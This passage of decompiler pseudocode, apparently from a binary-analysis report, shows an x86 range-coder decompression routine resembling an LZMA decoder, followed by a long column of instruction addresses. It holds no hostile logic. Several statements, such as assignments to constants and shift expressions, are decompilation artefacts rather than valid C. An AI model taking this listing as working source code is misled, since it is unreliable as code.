												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                                          0x00000000
                                                                                                                          0x004065d2
                                                                                                                          0x004065d2
                                                                                                                          0x004065d6
                                                                                                                          0x004065f7
                                                                                                                          0x004065fe
                                                                                                                          0x00406604
                                                                                                                          0x0040660a
                                                                                                                          0x0040661c
                                                                                                                          0x00406622
                                                                                                                          0x00406627
                                                                                                                          0x00000000
                                                                                                                          0x004065d8
                                                                                                                          0x004065de
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a8
                                                                                                                          0x004069ae
                                                                                                                          0x004069b4
                                                                                                                          0x004069ce
                                                                                                                          0x004069d1
                                                                                                                          0x004069d7
                                                                                                                          0x004069e2
                                                                                                                          0x004069e4
                                                                                                                          0x004069b6
                                                                                                                          0x004069b6
                                                                                                                          0x004069c5
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x004069ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069f0
                                                                                                                          0x004069f4
                                                                                                                          0x00406ba3
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bc1
                                                                                                                          0x00406bc8
                                                                                                                          0x00406bca
                                                                                                                          0x00406bd1
                                                                                                                          0x00406bd5
                                                                                                                          0x00406bd5
                                                                                                                          0x00406a00
                                                                                                                          0x00406a07
                                                                                                                          0x00406a0f
                                                                                                                          0x00406a12
                                                                                                                          0x00406a15
                                                                                                                          0x00406a15
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00000000
                                                                                                                          0x004061d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061da
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x004061e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061ea
                                                                                                                          0x004061ed
                                                                                                                          0x004061ef
                                                                                                                          0x004061f0
                                                                                                                          0x004061f3
                                                                                                                          0x004061f5
                                                                                                                          0x004061f6
                                                                                                                          0x004061f8
                                                                                                                          0x004061fb
                                                                                                                          0x00406200
                                                                                                                          0x00406205
                                                                                                                          0x0040620e
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406230
                                                                                                                          0x00406258
                                                                                                                          0x0040625a
                                                                                                                          0x00406268
                                                                                                                          0x00406268
                                                                                                                          0x0040626c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x0040625c
                                                                                                                          0x0040625f
                                                                                                                          0x00406260
                                                                                                                          0x00406260
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x00406236
                                                                                                                          0x0040623b
                                                                                                                          0x0040623b
                                                                                                                          0x00406244
                                                                                                                          0x0040624c
                                                                                                                          0x0040624f
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406272
                                                                                                                          0x00406272
                                                                                                                          0x00406276
                                                                                                                          0x00406b22
                                                                                                                          0x00000000
                                                                                                                          0x00406b22
                                                                                                                          0x0040627f
                                                                                                                          0x0040628f
                                                                                                                          0x00406292
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406298
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629e
                                                                                                                          0x004062a4
                                                                                                                          0x004062ce
                                                                                                                          0x004062d4
                                                                                                                          0x004062db
                                                                                                                          0x00000000
                                                                                                                          0x004062db
                                                                                                                          0x004062aa
                                                                                                                          0x004062ad
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062bd
                                                                                                                          0x004062c5
                                                                                                                          0x004062c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040630d
                                                                                                                          0x00406313
                                                                                                                          0x00406316
                                                                                                                          0x00406323
                                                                                                                          0x0040632b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062e2
                                                                                                                          0x004062e2
                                                                                                                          0x004062e6
                                                                                                                          0x00406b31
                                                                                                                          0x00000000
                                                                                                                          0x00406b31
                                                                                                                          0x004062f2
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x00406300
                                                                                                                          0x00406303
                                                                                                                          0x00406306
                                                                                                                          0x0040630b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a8
                                                                                                                          0x004069ae
                                                                                                                          0x004069b4
                                                                                                                          0x004069ce
                                                                                                                          0x004069d1
                                                                                                                          0x004069d7
                                                                                                                          0x004069e2
                                                                                                                          0x004069e4
                                                                                                                          0x004069b6
                                                                                                                          0x004069b6
                                                                                                                          0x004069c5
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x004069ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406333
                                                                                                                          0x00406335
                                                                                                                          0x00406338
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063b6
                                                                                                                          0x004063c0
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040633a
                                                                                                                          0x0040633e
                                                                                                                          0x00406341
                                                                                                                          0x00406343
                                                                                                                          0x00406346
                                                                                                                          0x00406349
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x00406350
                                                                                                                          0x00406355
                                                                                                                          0x00406358
                                                                                                                          0x0040635b
                                                                                                                          0x0040635f
                                                                                                                          0x00406366
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406374
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x00406380
                                                                                                                          0x00406383
                                                                                                                          0x004063a1
                                                                                                                          0x004063a3
                                                                                                                          0x00000000
                                                                                                                          0x00406385
                                                                                                                          0x00406385
                                                                                                                          0x00406388
                                                                                                                          0x0040638b
                                                                                                                          0x0040638e
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406393
                                                                                                                          0x00406396
                                                                                                                          0x00406398
                                                                                                                          0x00406399
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040663c
                                                                                                                          0x00406640
                                                                                                                          0x00406663
                                                                                                                          0x00406666
                                                                                                                          0x00406669
                                                                                                                          0x00406673
                                                                                                                          0x00406642
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406648
                                                                                                                          0x0040664b
                                                                                                                          0x00406658
                                                                                                                          0x0040665b
                                                                                                                          0x0040665b
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040667f
                                                                                                                          0x00406683
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406689
                                                                                                                          0x0040668d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406693
                                                                                                                          0x00406695
                                                                                                                          0x00406699
                                                                                                                          0x00406699
                                                                                                                          0x0040669c
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066f0
                                                                                                                          0x004066f4
                                                                                                                          0x004066fb
                                                                                                                          0x004066fe
                                                                                                                          0x00406701
                                                                                                                          0x0040670b
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x004066f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406717
                                                                                                                          0x0040671b
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406744
                                                                                                                          0x00406749
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067d7
